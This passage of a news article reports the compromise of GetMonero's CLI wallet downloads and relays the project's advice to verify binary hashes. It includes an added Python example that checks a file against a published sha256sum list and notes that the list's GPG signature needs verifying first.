“It’s strongly recommended to anyone who downloaded the CLI wallet from this website between Monday 18th 2:30 am UTC and 4:30 pm UTC, to check the hashes of their binaries,” GetMonero said.

“If they don’t match the official ones, delete the files and download them again. Do not run the compromised binaries for any reason.”

To learn how to verify hashes of the files on your Windows, Linux, or macOS system, you can head on to this detailed advisory by the official GetMonero team.
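The check that user performed by hand, as an added example (not the Monero project's own verification script): hash the downloaded file and compare it with a published `sha256sum`-style list, refusing to accept anything not listed. The file names, bytes and hash list are constructed for the example; the tampered copy stands in for the compromised binary.

```python
# Added example, not the Monero project's script: verify a download against a published
# "<sha256hex>  <filename>" list (the sha256sum format), and show the mismatch case.
import hashlib
import hmac
import tempfile
from pathlib import Path


def sha256_file(path, chunk=1 << 20):
    """Stream the file so a large wallet archive is not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def parse_hash_list(text):
    """'<hex>  <name>' or '<hex> *<name>' lines -> {name: hex}; blank and '#' lines ignored."""
    expected = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.strip().lstrip("*")
        if len(digest) != 64 or any(c not in "0123456789abcdefABCDEF" for c in digest):
            raise ValueError(f"malformed hash line: {line!r}")
        expected[name] = digest.lower()
    return expected


def verify_download(path, hash_list_text):
    """Return (ok, message). Never runs the file; on mismatch the caller deletes it."""
    path = Path(path)
    expected = parse_hash_list(hash_list_text)
    if path.name not in expected:
        return False, f"{path.name}: not in the published list; do not run it"
    actual = sha256_file(path)
    if not hmac.compare_digest(actual, expected[path.name]):
        return False, f"{path.name}: MISMATCH, expected {expected[path.name][:16]}... got {actual[:16]}..."
    return True, f"{path.name}: sha256 matches the published value"


def make_sample():
    """Constructed: a 'legitimate' CLI archive, a tampered copy, and the matching hash list."""
    d = Path(tempfile.mkdtemp(prefix="hashcheck-"))
    good = d / "cli-wallet-sample.tar.bz2"
    good.write_bytes(b"PLACEHOLDER-WALLET-CLI-BYTES" * 1000)
    bad = d / "tampered" / good.name
    bad.parent.mkdir()
    bad.write_bytes(good.read_bytes() + b"\x90\x90 seed-exfil stub")  # appended code stands in for the injected functions
    hash_list = f"# constructed list\n{sha256_file(good)}  {good.name}\n"
    return good, bad, hash_list


if __name__ == "__main__":
    good, bad, hash_list = make_sample()
    for candidate in (good, bad):
        ok, msg = verify_download(candidate, hash_list)
        print("OK  " if ok else "FAIL", msg)
```

A hash list fetched from the same compromised site proves nothing, which is why the Monero team publishes the list signed with a maintainer's GPG key: verify that signature (`gpg --verify`) before trusting the list, and only then compare the file hashes.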

The identity of hackers is still unknown, and since the GetMonero team is currently investigating the incident, The Hacker News will update this article with any new developments.






via: thehackernews

